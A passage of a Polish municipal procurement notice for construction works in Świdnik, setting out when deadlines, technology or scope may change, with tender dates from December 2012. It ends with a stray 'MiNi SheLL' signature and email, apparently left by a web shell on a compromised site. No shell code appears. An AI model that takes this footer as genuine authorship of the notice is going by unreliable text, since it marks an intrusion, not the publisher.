2)Zamawiający dopuszcza możliwość zmiany terminu realizacji przedmiotu zamówienia.Zmiana taka może nastąpić jedynie w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Okolicznościami takimi będą : 
a)warunki atmosferyczne - w szczególności długotrwałe ulewne deszcze, mróz , porywiste wiatry uniemożliwiające lub utrudniające wykonywanie robót zgodnie z technologią, 
b)ujawnienia niewybuchów i niewypałów wymagających wstrzymania robót i dokonania ich usunięcia przez służby specjalistyczne.
c)roboty dodatkowe , o ile nie będzie ich można wykonywać równolegle z zamówieniem podstawowym,
d)błąd w dokumentacji projektowej , gdy konieczność zmiany wymaga wprowadzenia zmian przez projektantów , uzyskania uzgodnień , opinii rzeczoznawców,
e)siła wyższa w rozumieniu przepisów Kodeksu Cywilnego.
Fakt ten musi być odnotowany w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru. 
3)W przypadku, gdy zostaną wydłużone terminy uzyskania niezbędnych uzgodnień i decyzji przez Wykonawcę nie z jego winy, pomimo dopełnienia przez Wykonawcę odpowiedniej staranności, termin przekazania przedmiotu umowy może ulec zmianie na pisemny wniosek Wykonawcy. 
4)W szczególnych przypadkach na wniosek Wykonawcy, w trakcie prowadzenia inwestycji, możliwa jest zmiana technologii wykonywania elementów robót. Zamawiający może wyrazić zgodę na zmianę jedynie w przypadku , 
gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie, jakościowo i technicznie od przewidzianego w projekcie.
W takich przypadkach Wykonawca zobowiązany jest przedstawić projekt zamienny zawierający opis proponowanych zmian, rysunki i wycenę kosztów. Projekt zamienny wymaga akceptacji nadzoru autorskiego, pracowni projektowej (projektanta) oraz Zamawiającego.
5)W przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, Zamawiający sporządza protokół konieczności, a następnie dostarcza dokumentację projektową wraz ze zleceniem. Warunki zmiany określone w punkcie poprzednim stosuje się odpowiednio.
6)Zamawiający zastrzega sobie prawo zmniejszenia zakresu przedmiotu zamówienia, gdy wykonanie całego zakresu będzie niemożliwe z przyczyn prawnych lub finansowych.    
7)Bez zgody Zamawiającego mogą być wykonywane jedynie prace mające na celu niezwłoczne zapobieżenie awarii, szkodzie lub utracie życia i zdrowia, o czym Wykonawca zobowiązany jest natychmiast zawiadomić Zamawiającego.
8)W przypadku ustawowej zmiany stawki podatku VAT, wynagrodzenie należne Wykonawcy podlega zmianie odpowiednio o kwotę podatku VAT wynikającą ze zmienionej stawki VAT ,obowiązującej w chwili powstania obowiązku podatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swidnik.tensoft.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> : Urząd Miasta Świdnik, 21-040 Świdnik ul.Kard.St.Wyszyńskiego 15 , pok. 218...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 12:00, miejsce: : Urząd Miasta Świdnik, 21-040 Świdnik ul.Kard.St.Wyszyńskiego 15 , pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com